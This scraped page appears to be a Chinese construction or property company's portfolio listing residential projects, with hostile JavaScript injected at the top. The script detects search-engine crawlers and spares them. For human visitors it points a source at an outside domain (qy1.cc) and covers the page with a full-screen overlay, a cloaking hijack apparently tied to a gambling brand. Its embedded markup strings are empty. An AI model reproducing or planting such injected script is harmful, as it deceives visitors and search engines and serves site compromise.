var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i; if (!reg.test(navigator.userAgent)) { let flag = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i); if (flag) { //k _src = 'https://qy1.cc/' } else { // PC _src = 'https://qy1.cc/' } document.write(''); var hd = document.head; var styleCSS = document.createElement('style'), yabo = document.createElement('div'); styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}'; yabo.setAttribute('class', 'yabo'); yabo.innerHTML = ''; hd.appendChild(styleCSS); hd.parentNode.appendChild(yabo); }

Our Project

精品项目

Portfolio
54所东风院 54所东风院 / 54suǒ dōng fēng yuàn
名悦山庄 名悦山庄 / míng yuè shān zhuāng
奥北公元西区(回迁) 奥北公元西区(回迁) / ào běi gōng yuán xī qū (huí qiān )
众美城廊桥四季A区 众美城廊桥四季A区 / zhòng měi chéng láng qiáo sì jì Aqū
军兴干休所 军兴干休所 / jūn xìng gàn xiū suǒ
正安愉园(正定) 正安愉园(正定) / zhèng ān yú yuán (zhèng dìng )
市中国岳城 市中国岳城 / shì zhōng guó yuè chéng
西焦城市花园东区 西焦城市花园东区 / xī jiāo chéng shì huā yuán dōng qū
北合街55号院 北合街55号院 / běi hé jiē 55hào yuàn